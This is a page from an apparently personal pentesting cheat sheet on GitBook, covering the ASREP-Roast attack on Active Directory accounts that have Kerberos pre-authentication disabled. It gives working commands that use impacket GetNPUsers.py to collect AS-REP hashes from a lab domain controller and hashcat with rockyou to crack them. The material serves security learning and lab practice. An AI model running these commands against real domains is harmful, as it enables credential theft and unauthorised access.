Cheat Sheet Hacking
  • 🌐Generic Ideas
    • File Transfer
    • Reverse Shell
    • Cracking Tricks
    • Tunneling and Port Forwarding
    • Reversing
    • OSINT
    • Phishing
  • 🐕‍🦺Port enumeration
    • Reconnaissance
    • 53 - DNS
    • 80,443 - Web
      • Identify php.ini file used
      • Exploitation
        • File Upload
        • XXS
    • 445 - SMB
    • 389, 636, 3268 - LDAP(S)
  • LINUX THINGS
    • Enumeration
    • Privilege Escalation
      • Writable $PATH
  • WINDOWS THINGS
    • Enumeration
    • Useful Commands
    • Active Directory Methodology
      • Commands to create AD environment
      • Attacks
        • Kerberos
          • User enumeration
          • ASREP-Roast
          • Kerberoasting
          • ASREP-Roast VS Kerberoasting
          • Golden Ticket
          • Resource Based Constrained Delegation
        • Secrets dump
        • Pass The Hash
        • Dump NTDS
        • Tickets
          • TGT
        • NTML Password Spray
        • LDAP Authentication
          • LDAP Pass-back
          • Rogue LDAP Server
        • SMB Relay (LLNMR, NTB-NS & WPAD)
        • NTLM Relay
        • Tools to exploit AD things
        • SCF Files
      • Kerberos
      • SAM & LSA secrets
      • Enumeration
        • BloodHound
        • PowerView
          • CheatSheet of Commands
        • Set DNS & DOMAIN
      • Resources
      • RunAs
      • Post Explotation
        • Persistence
        • Mimikatz
      • Common used tools
  • 🕳️Pivoting
    • Port Forwarding
    • Socks Forwarding
    • Routing
    • Web Fuzzing
    • Transfer files
    • Metasploit
      • Single Pivot
      • Double Pivot
    • Burp Suite
  • 🎛️Hardware
    • Physical attacks
  • 🌕Buffer Overflow
    • Introduction
    • Stack-Based
      • Introduction
        • Spiking
        • Fuzzing
        • Find Offset
        • Overwrite EIP
        • Find module
        • Find Badchars
        • Shellcode
  • 🐳Docker
    • Commands
    • Practical examples
  • 💡Useful things
    • Burp Suite
      • Proxy Activation
    • Linux Commands
    • Recreate multipart/form-data request
      • Python
      • HTML & netcat
    • TTY
    • Templates for reports (exams)
    • Tmux
    • Other cheat sheets
Powered by GitBook
On this page
  1. WINDOWS THINGS
  2. Active Directory Methodology
  3. Attacks
  4. Kerberos

ASREP-Roast

PreviousUser enumerationNextKerberoasting

Last updated 6 months ago

Attack to find accounts with the privilege "Does not require Pre-Authentication" (this enables the user to request tickets without a previous authentication in the KDC) and extract its TGTs for cracking.

"Without Kerberos Pre-Auth" (the request from Client to request a TGT to the KDC), "when a client sends an Authentication Service request, the client’s User Principle Name (UPN) is included in the request with not much additional verification data. The KDC checks if the UPN exists in its database. If so, the KDC sends back an Authentication Service reply including a Ticket Granting ticket."

Using the GetNPUsers.py tool of impacket and passing an existent list of users we can check those accounts.

➧ cat users_valid.txt 
james@spookysec.local
[...]
python3 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile users_valid.txt -dc-ip 10.10.253.172 -format hashcat -outputfile users_asreproastables.txt 'spookysec.local/'
hashcat -a 0 -m 18200 users_asreproastables.txt /usr/share/wordlists/rockyou.txt -o users_asreproastables.txt.cracked
https://www.linkedin.com/pulse/kerberos-pre-auth-one-checkbox-can-mean-lot-darryl
GetNPUsers.pyThe Hacker Tools
Logo